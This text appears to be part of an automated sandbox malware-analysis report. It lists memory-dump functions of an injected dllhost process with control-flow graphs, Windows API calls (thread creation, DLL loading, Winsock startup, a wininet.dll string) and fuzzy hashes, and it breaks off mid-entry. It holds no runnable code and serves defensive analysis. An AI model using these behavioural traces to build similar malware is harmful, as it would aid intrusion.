                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: f9aca007bac32c4cc09f0b9c6e23622ad3a3930c0a061efff91ec127606ad0f4
                                                                                                      • Instruction ID: 23609f9cdca87d87f9430afe290a5353fb69c157d97558ca24fd7e88c597d03c
                                                                                                      • Opcode Fuzzy Hash: f9aca007bac32c4cc09f0b9c6e23622ad3a3930c0a061efff91ec127606ad0f4
                                                                                                      • Instruction Fuzzy Hash: E890023130140817D112B1984504707040987D0241FA5C453B5428558D97568A56A522
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 9fe7d04d978e00209291552af91af5e82792a0233403cf72992208c09870eded
                                                                                                      • Instruction ID: ec1f5e22e495670bf82e3e3c2a94408fd32cde67a4884071a79a397faf9faf26
                                                                                                      • Opcode Fuzzy Hash: 9fe7d04d978e00209291552af91af5e82792a0233403cf72992208c09870eded
                                                                                                      • Instruction Fuzzy Hash: EE90022931340406D181B198540860A040587D1202FA5D456B5019558CCA15896D5722
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: d114d45440b76516b63b730948ed2f88d2ab19f5ce3f6f8213492c49e8a9bbd4
                                                                                                      • Instruction ID: 97780e3970dab8d386066cc52ce40a1ad8c7907af5113b0b964309eb49fed1e4
                                                                                                      • Opcode Fuzzy Hash: d114d45440b76516b63b730948ed2f88d2ab19f5ce3f6f8213492c49e8a9bbd4
                                                                                                      • Instruction Fuzzy Hash: 7390022130140407D141B19854186064405D7E1301F65D052F5418554CDA15895A5623
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 39dbb4d4ca0bacdf657385fd390de56589ef7a16740f1c96746950ce0c1ddc80
                                                                                                      • Instruction ID: bca368da644443104a60d1cdfab828e74eb6da401472738506cfd55412f6419f
                                                                                                      • Opcode Fuzzy Hash: 39dbb4d4ca0bacdf657385fd390de56589ef7a16740f1c96746950ce0c1ddc80
                                                                                                      • Instruction Fuzzy Hash: 0F90023130140806D101B5D85408646040587E0301F65D052BA028555EC76589956532
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 2cc4ae0893223cda341248485bd8eb0e7cebba756e5481dc5ded6f72de1cf22d
                                                                                                      • Instruction ID: 7251154d9f197fe87b4116e4ee816e03f0c10d6207fa45784e25950ebab33f94
                                                                                                      • Opcode Fuzzy Hash: 2cc4ae0893223cda341248485bd8eb0e7cebba756e5481dc5ded6f72de1cf22d
                                                                                                      • Instruction Fuzzy Hash: 8790023130140C46D101B1984404B46040587E0301F65C057B5128654D8715C9557922
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 370f0526777013adde651c88ee3f8a06620e35412dd9ac6fc8f95722f1f3f39b
                                                                                                      • Instruction ID: a756fe80a2d713eb765093b313710b486102e47036154adb6ff02955cc2bed84
                                                                                                      • Opcode Fuzzy Hash: 370f0526777013adde651c88ee3f8a06620e35412dd9ac6fc8f95722f1f3f39b
                                                                                                      • Instruction Fuzzy Hash: C290023130148C06D111B198840474A040587D0301F69C452B9428658D879589957522

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 155 30f0c41-30f0c43 156 30f0caf-30f0cde call 310b390 call 310bda0 call 30f4400 call 30e1410 155->156 157 30f0c45-30f0c4a 155->157 162 30f0ce0-30f0d0e call 3101ac0 156->162 158 30f0c4c-30f0c69 157->158 159 30f0bf6-30f0c1c 157->159 161 30f0c6b-30f0c70 158->161 158->162 159->155 168 30f0bab-30f0bda 159->168 170 30f0d30-30f0d35 162->170 171 30f0d10-30f0d21 PostThreadMessageW 162->171 168->159 171->170 173 30f0d23-30f0d2d 171->173 173->170
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(86OGa169Q,00000111,00000000,00000000), ref: 030F0D1D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 86OGa169Q$86OGa169Q
                                                                                                      • API String ID: 1836367815-1739427488
                                                                                                      • Opcode ID: 0cdeea7029033c0cb3ac8272586419a90a25fcbba03d5f111c4271f2ffdc891c
                                                                                                      • Instruction ID: 8290b63d21c5da700ecdf41768c0ab8801f601a9b7c9e26ce0dedb787c615b1d
                                                                                                      • Opcode Fuzzy Hash: 0cdeea7029033c0cb3ac8272586419a90a25fcbba03d5f111c4271f2ffdc891c
                                                                                                      • Instruction Fuzzy Hash: 87317A32941344BFE721CFB48C01FDEBFA8AF41714F198459EA406F982C3745542CBA5

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(86OGa169Q,00000111,00000000,00000000), ref: 030F0D1D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 86OGa169Q$86OGa169Q
                                                                                                      • API String ID: 1836367815-1739427488
                                                                                                      • Opcode ID: 6e720d2c289d67a4bca2df06bd24bd79f254016553bea8e9f42069b61643de2a
                                                                                                      • Instruction ID: 6fd9bf32e346f5a85659e3db3a9784121d0c54c7a1acc834b29343c1d14f2f8b
                                                                                                      • Opcode Fuzzy Hash: 6e720d2c289d67a4bca2df06bd24bd79f254016553bea8e9f42069b61643de2a
                                                                                                      • Instruction Fuzzy Hash: DA118276E4121877E721E6908C42FDF7B6C9F41B54F048454BE047E2C1D6B4A60687A5

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(86OGa169Q,00000111,00000000,00000000), ref: 030F0D1D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 86OGa169Q$86OGa169Q
                                                                                                      • API String ID: 1836367815-1739427488
                                                                                                      • Opcode ID: 9fa122e5dc85807de0f6bdafd097de4135218cff1e2b7668980316033e6c0e13
                                                                                                      • Instruction ID: 6c281153869685bdf68817cceb17fa238a66126253be4f3789fb084221116fab
                                                                                                      • Opcode Fuzzy Hash: 9fa122e5dc85807de0f6bdafd097de4135218cff1e2b7668980316033e6c0e13
                                                                                                      • Instruction Fuzzy Hash: 00019676E413587AEB21E7908C41FDF7B7C9F41B54F148454FA047F2C0D6B4660687A5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 207 3103940-3103988 call 310b260 210 3103a94-3103a9a 207->210 211 310398e-3103a08 call 310b340 call 30f4400 call 30e1410 call 3101ac0 207->211 220 3103a10-3103a24 Sleep 211->220 221 3103a85-3103a8c 220->221 222 3103a26-3103a38 220->222 221->220 223 3103a8e 221->223 224 3103a5a-3103a73 call 3105e90 222->224 225 3103a3a-3103a58 call 3105df0 222->225 223->210 229 3103a78-3103a7b 224->229 225->229 229->221
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 03103A1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                      • Opcode ID: fc4a89335406028126f37f2b4d0ad72e5e8e00999922c12d2dd3ea2958301593
                                                                                                      • Instruction ID: 1bb562748b9aa66f956cca79d03654ab291f0cde4188a8656a9385f170bc6889
                                                                                                      • Opcode Fuzzy Hash: fc4a89335406028126f37f2b4d0ad72e5e8e00999922c12d2dd3ea2958301593
                                                                                                      • Instruction Fuzzy Hash: 65318FB9601305BBD714DF64CC84FEBB7B8BB88700F14451DA519AB280D7B46641CBA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 230 30f1900-30f1945 call 30e17a0 call 30f7d00 235 30f194b-30f199f call 310b3d0 * 3 call 30f5df0 230->235 236 30f1c26-30f1c2b 230->236 245 30f19a1-30f19c6 call 3105360 * 2 235->245 246 30f19f0-30f19f7 235->246 256 30f19cb-30f19db 245->256 247 30f1a1b-30f1a6f call 310ab90 call 310b340 246->247 248 30f19f9-30f1a01 246->248 262 30f1a78 247->262 263 30f1a71-30f1a76 247->263 248->247 250 30f1a03-30f1a0a 248->250 250->247 253 30f1a0c-30f1a10 250->253 253->247 257 30f1a12-30f1a18 call 30f68d0 253->257 256->246 259 30f19dd-30f19e4 256->259 257->247 259->248 264 30f19e6-30f19ed call 30f5f90 259->264 266 30f1a7a-30f1a96 call 310b310 262->266 263->266 264->246 271 30f1a9c 266->271 272 30f1ba3-30f1bfc call 30e7e30 call 30f4400 call 30e14a0 call 3101ac0 266->272 273 30f1aa0-30f1aa9 271->273 296 30f1bfe-30f1c0a WSAStartup 272->296 297 30f1c0c-30f1c18 call 3107e00 272->297 275 30f1aaf-30f1acc call 310b340 273->275 276 30f1b97-30f1b9d 273->276 283 30f1ace-30f1ad5 275->283 284 30f1ad7 275->284 276->272 276->273 286 30f1ad9-30f1ae7 283->286 284->286 288 30f1afe-30f1b29 call 30f4300 call 310b340 286->288 289 30f1ae9 286->289 303 30f1b2b-30f1b30 288->303 304 30f1b32 288->304 292 30f1af0-30f1af3 289->292 293 30f1afc 292->293 294 30f1af5-30f1af8 292->294 293->288 294->292 298 30f1afa 294->298 296->297 302 30f1c1d-30f1c20 297->302 298->288 302->236 305 30f1b34-30f1b3a 303->305 304->305 306 30f1b4e-30f1b71 call 30f4300 305->306 307 30f1b3c 305->307 313 30f1b7d-30f1b94 call 310b310 306->313 314 30f1b78 call 310b310 306->314 309 30f1b40-30f1b43 307->309 311 30f1b4c 309->311 312 30f1b45-30f1b48 309->312 311->306 312->309 315 30f1b4a 312->315 313->276 314->313 315->306
                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 030F1C0A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID:
                                                                                                      • API String ID: 724789610-0
                                                                                                      • Opcode ID: a51c8e01e2841ddf7cd56fc61499abfb8469ab875ad739843bef2e5d65931919
                                                                                                      • Instruction ID: 7f9b86abb8f381c4a33931dacda79847a7f64ab4bcd2b20188f62752650baff7
                                                                                                      • Opcode Fuzzy Hash: a51c8e01e2841ddf7cd56fc61499abfb8469ab875ad739843bef2e5d65931919
                                                                                                      • Instruction Fuzzy Hash: 01A18175E01309EFDB58DFA4C845BDEF7F8BF48300F144269E608AB640E7B066558BA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 348 30f1b6d-30f1b78 call 310b310 350 30f1b7d-30f1b94 call 310b310 348->350 353 30f1b97-30f1b9d 350->353 354 30f1ba3-30f1bbd call 30e7e30 353->354 355 30f1aa0-30f1aa9 353->355 359 30f1bc2-30f1bcd call 30f4400 354->359 355->353 356 30f1aaf-30f1acc call 310b340 355->356 363 30f1ace-30f1ad5 356->363 364 30f1ad7 356->364 362 30f1bd2-30f1bfc call 30e14a0 call 3101ac0 359->362 378 30f1bfe-30f1c0a WSAStartup 362->378 379 30f1c0c-30f1c18 call 3107e00 362->379 366 30f1ad9-30f1ae7 363->366 364->366 368 30f1afe-30f1b29 call 30f4300 call 310b340 366->368 369 30f1ae9 366->369 384 30f1b2b-30f1b30 368->384 385 30f1b32 368->385 372 30f1af0-30f1af3 369->372 373 30f1afc 372->373 374 30f1af5-30f1af8 372->374 373->368 374->372 377 30f1afa 374->377 377->368 378->379 383 30f1c1d-30f1c2b 379->383 386 30f1b34-30f1b3a 384->386 385->386 388 30f1b4e-30f1b71 call 30f4300 386->388 389 30f1b3c 386->389 388->350 395 30f1b78 call 310b310 388->395 391 30f1b40-30f1b43 389->391 393 30f1b4c 391->393 394 30f1b45-30f1b48 391->394 393->388 394->391 396 30f1b4a 394->396 395->350 396->388
                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 030F1C0A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID:
                                                                                                      • API String ID: 724789610-0
                                                                                                      • Opcode ID: 3358874578fb83b9c2eccd75bb2ec413924a90458ab4ddfb8e2df401defe70a3
                                                                                                      • Instruction ID: 02d4cbffa71b295620f1ae25d9261da268f6440cac58ffe8b826b69cd9718df3
                                                                                                      • Opcode Fuzzy Hash: 3358874578fb83b9c2eccd75bb2ec413924a90458ab4ddfb8e2df401defe70a3
                                                                                                      • Instruction Fuzzy Hash: DF117275D02309EFDB05DBE48C41BEEB7B8AF89600F14425ADA08BB241E7B16A1587E5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 397 30f4400-30f441c 398 30f4424-30f4429 397->398 399 30f441f call 310bed0 397->399 400 30f442f-30f443d call 310c4d0 398->400 401 30f442b-30f442e 398->401 399->398 404 30f443f-30f444a call 310c770 400->404 405 30f444d-30f445e call 310a970 400->405 404->405 410 30f4477-30f447a 405->410 411 30f4460-30f4474 LdrLoadDll 405->411 411->410
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030F4472
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                                                                                      • Instruction ID: 6999dd7f0d901dd1d5a0f5eaf489658a2f4f4e0b7ca933532ef55e1072b24eb0
                                                                                                      • Opcode Fuzzy Hash: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                                                                                      • Instruction Fuzzy Hash: 8501D2B9D4020DBBDB10EAE5DC41F9EB7B8AB54208F044195AE08AB581F671E7548B91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 412 30e9e30-30e9e54 call 30e1410 415 30e9e5a-30e9e61 412->415 416 30e9e55 call 3101ac0 412->416 417 30e9e63-30e9e7f call 310c8b7 CreateThread 415->417 418 30e9e80-30e9e85 415->418 416->415
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030E9E75
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: 1046872ea803e0ac4b34fd74aff4069c684baf348b4af650777d456d83630e3b
                                                                                                      • Instruction ID: b8c17d7d45acbc96dd8e7949a200ad44c2a432ecb7753d5c30678e43d7536033
                                                                                                      • Opcode Fuzzy Hash: 1046872ea803e0ac4b34fd74aff4069c684baf348b4af650777d456d83630e3b
                                                                                                      • Instruction Fuzzy Hash: 95F0307734130437E221A1A99C02FD7A69C8B84B61F180426F70CEB2C0D9A5B54142A4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 421 3109580-31095c4 call 30e14a0 call 310a480 RtlAllocateHeap
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000,?,00000000,?,?,0310167C,?), ref: 031095BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 41592625d0ab28f2b350b862fd77c08795144b9b395685bdcbbbe4352174f43e
                                                                                                      • Instruction ID: b64ebc482a11f571576c1a494ffc9d4e88c528947b4a458e11664d08254438d5
                                                                                                      • Opcode Fuzzy Hash: 41592625d0ab28f2b350b862fd77c08795144b9b395685bdcbbbe4352174f43e
                                                                                                      • Instruction Fuzzy Hash: AFE032BA201208BBE614EA58DC41EAB37ACEFC8610F004418F908AB242D670B9108AB8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 426 31095d0-3109614 call 30e14a0 call 310a480 RtlFreeHeap
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E8458D01,00000007,00000000,00000004,00000000,030F3CDE,000000F4), ref: 0310960F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3298025750-0
                                                                                                      • Opcode ID: 605a280aa81bad0a613252374f56a12db071bb75b416c4b50682ae087d27af20
                                                                                                      • Instruction ID: 1bfd6327f8db9a6d09b5e454431012d1e9511789319c590bdccb1f117dda130d
                                                                                                      • Opcode Fuzzy Hash: 605a280aa81bad0a613252374f56a12db071bb75b416c4b50682ae087d27af20
                                                                                                      • Instruction Fuzzy Hash: 82E06DB62003047FD614EE99DC45EAB37ACEFC8710F004419F908A7241D770B9108AB4
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030E9E75
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: ffa59f5d23261c5b9eac69fee62e20b8e8edb341ef00bee7b310fa868f7680c0
                                                                                                      • Instruction ID: 57daabb2ad6c2f91cf3e0b683278db582592dac7469831f6a1c7cef48cae7b91
                                                                                                      • Opcode Fuzzy Hash: ffa59f5d23261c5b9eac69fee62e20b8e8edb341ef00bee7b310fa868f7680c0
                                                                                                      • Instruction Fuzzy Hash: E0E0D87728070067E33166B89E41FABB5688FC0711F5C01ABF60AAE1C5DAA6A2158AD4
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030F1C50,03107E6F,0310552F,030F1C1D), ref: 030F8003
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 165508430858d9cad1747d05cd119b14efa42e147d85be9141ef617b904faf72
                                                                                                      • Instruction ID: 5b91ca6b4142e9dd79c9a7987a6083d3243ac3f9cbb3e7d5578f79e981fd9928
                                                                                                      • Opcode Fuzzy Hash: 165508430858d9cad1747d05cd119b14efa42e147d85be9141ef617b904faf72
                                                                                                      • Instruction Fuzzy Hash: 28E0CD792413097FEB54FBA4CE47F5633D85B80344F058874B508FB6C1E975E5004650
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030F1C50,03107E6F,0310552F,030F1C1D), ref: 030F8003
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 41910efffcd0e93e72591341ab04549e0cdabfa9997d7443f6c55882e3f007b6
                                                                                                      • Instruction ID: 45575620851d639f50964e8567ce2e7713da3ee16e2b803b8d3f8f069410c2aa
                                                                                                      • Opcode Fuzzy Hash: 41910efffcd0e93e72591341ab04549e0cdabfa9997d7443f6c55882e3f007b6
                                                                                                      • Instruction Fuzzy Hash: A9D05EBA3423097FE690F6A5CC0AF9632CC4B84758F098464BA08FB7C2ED65F5004665
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 09b4e79a694e0e0c74df767865150b7391b67eb24a5bbbf45d044524fb586d2b
                                                                                                      • Instruction ID: d70c48a76195c4360476a75fe30f439a856e3c811ece5b62d9776142de242c7e
                                                                                                      • Opcode Fuzzy Hash: 09b4e79a694e0e0c74df767865150b7391b67eb24a5bbbf45d044524fb586d2b
                                                                                                      • Instruction Fuzzy Hash: 15B09B719055C9C9DA11E7A046087177D0467D0701F29C4E2F3034681E4779C1D5E576
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
